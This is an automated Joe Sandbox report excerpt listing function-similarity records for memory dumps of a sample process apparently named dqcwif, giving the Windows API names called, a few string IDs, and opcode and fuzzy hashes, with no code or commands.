                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ShowWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1268545403-0
                                                                                                          • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                          • Instruction ID: 94ff765b71ac00042482955e02bd87e0f6148ae261dccf7e82bf1df55ef22844
                                                                                                          • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                          • Instruction Fuzzy Hash: 8F516225E0C58289FB79AB2D94783F926929F83F44F284175C70E866DFDE6CAC94D201
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 3225163088-0
                                                                                                          • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                          • Instruction ID: d5041923aa3a4e886942805a2d3bf240a8d96677d5fa48291f55070db8b01a1a
                                                                                                          • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                          • Instruction Fuzzy Hash: DCA1A072A186C087D7648F1AA410AAEFB75FB86B94F504125DB8953B6DCF3DD842CF00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Enabled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3694350264-0
                                                                                                          • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                          • Instruction ID: e439fef67e420ddb4be001846e5a1b6eaa14b2daf0900aea3d08fb56fdb3b3e8
                                                                                                          • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                          • Instruction Fuzzy Hash: D8918E21E1968646FBB49B1994657F963A2AF86F84F144072CB4D836DBCF3CEC918308
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                                          • Instruction ID: 2c81c54e5b13b9fe17543a1681d2ae402f0ced6fe7700f6eb77c7497875187e8
                                                                                                          • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                                          • Instruction Fuzzy Hash: E751B152A0C6D255F7B187795121BBD2F61FB57FC4F489078EB8947E8BCE08E8548321
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                          • String ID:
                                                                                                          • API String ID: 3401586794-0
                                                                                                          • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                          • Instruction ID: f4b58f70577b017a1ff687294bf446eafa963dfff3c17367aa44c459a6fb825d
                                                                                                          • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                          • Instruction Fuzzy Hash: 9451D362608A828AF714DF29E860AEE67A0FB4AF88F544031DF4D47B5ADF39D855C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                                          • String ID: DllGetClassObject
                                                                                                          • API String ID: 668425406-1075368562
                                                                                                          • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                                          • Instruction ID: 49fa5ab6b0e2db3ec171523846b84ce30e584d96c99c70f971515efc34b4e724
                                                                                                          • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                                          • Instruction Fuzzy Hash: D1518032A18B8686EB189F1AE5603B96360FB56F84F048134DB4D87A9BDF7CF854C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3360111000-0
                                                                                                          • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                          • Instruction ID: 76b9b7fe0144e8f8fa10e04ac00a2144ab2c666284e89c36b9335b66192cd150
                                                                                                          • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                          • Instruction Fuzzy Hash: F8416126A18A5581FA60CB1DD4A56B83361EBC6F94F144132CF5E87BAACF3DE841C704
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 4170576061-0
                                                                                                          • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                          • Instruction ID: f887be3de2efc10bb5bab7f27eebc352f321147412314fba0361e8f926a986a8
                                                                                                          • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                          • Instruction Fuzzy Hash: 5C419372A08A8282E7209F29A4A46ED7760FB46FA4F404235DF5E837DACF7CD945C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                          • String ID:
                                                                                                          • API String ID: 161812096-0
                                                                                                          • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                                          • Instruction ID: 6494447e9fdccdeaedca3b6f8e30fd096fcc66c0f1f8e205f03db8653869ac0c
                                                                                                          • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                                          • Instruction Fuzzy Hash: 46414936A04A4586EB50CF2AD8956EC37A1FB4AF98F154035DF4E877AACF38D845C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 395352322-0
                                                                                                          • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                          • Instruction ID: 34d1d85aac884ef3f531e382c41f6ce053d4b482f722ebcfd1ff118018c2e998
                                                                                                          • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                          • Instruction Fuzzy Hash: AB41A532618B8586E721CF15E4647EE63A0FB8AB44F844131EB8D97A9DCF3DD949CB04
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocByteCharMultiStringWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 3603722519-0
                                                                                                          • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                                                          • Instruction ID: 433bf3e96aeaf74ce7b0a20f3eb95aec883fab9dfa8af282657e0987ef6b6af0
                                                                                                          • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                                                          • Instruction Fuzzy Hash: 9A317731A48B4689DB249F16E4546B973A0FB56F90F484236DB5D837DBDF3CD9848700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                          • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                                          • Instruction ID: 23655703474fef4d793ce94c608a626f68ce1f82d4d79ada1d810e673e3d5534
                                                                                                          • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                                          • Instruction Fuzzy Hash: 5E315C36608A9187E3608F59F455B5AB761EB89B90F109139EB9983B99CF3CD845CF00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandlePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                          • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                          • Instruction ID: cd5377d7fe9b7e28fe432ec84dbcbb9e6b84a19bf571d78ccdd7812477ba6866
                                                                                                          • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                          • Instruction Fuzzy Hash: 03318272A18A8682EB518F68D4343B922A0EB97F78F544330DB7D867DACF3CD8458741
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandlePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                          • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                          • Instruction ID: 183d6dcc62cc82c595e82d372f41a233b5ea3ea030d891a7b73d753d87ecef1e
                                                                                                          • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                          • Instruction Fuzzy Hash: 02218221A18B8682EB118B68D0243B963A0FB96F78F504331DB6E867DFDF7CD8448701
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: f$p
                                                                                                          • API String ID: 3215553584-1290815066
                                                                                                          • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                          • Instruction ID: 3b75130591b7d6cca3d7193f86ca828631ecdf98a43463ad1b77f57ea8b50bb1
                                                                                                          • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                          • Instruction Fuzzy Hash: AD12A722E0C15386FB309A1EE0646FA7663EB52F54F944231D799866CEDF3DED809B01
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 564229958-0
                                                                                                          • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                          • Instruction ID: 0ad1ff98f1c61bfff4f53e68c40b518736d6e7ea17b7b3833a195e19ab05775e
                                                                                                          • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                          • Instruction Fuzzy Hash: 20516622A1868299EB20DF78D4602E96364FF95F84F800132E74D9769FDFA8DB45C740
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 0-2263619337
                                                                                                          • Opcode ID: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                                                                          • Instruction ID: b29d5feb7a7ed058cc90207fbf1cf717eedb1f510129348664f2ba610dd0643c
                                                                                                          • Opcode Fuzzy Hash: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                                                                          • Instruction Fuzzy Hash: 9F517026B09A4289FE24DB6DD0641FC27A5EB46F88F148135DB0E8779FDE39E806C350
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                          • String ID:
                                                                                                          • API String ID: 2592858361-0
                                                                                                          • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                          • Instruction ID: 36df381a18c6502243b1a7d26d2ba7c712d0c11f96ed026f9aa19dec025d697c
                                                                                                          • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                          • Instruction Fuzzy Hash: EF518132A08B5286EB20CB19D4687F97B60FB46F94F144135DB5D87B9ACF7DE8058710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
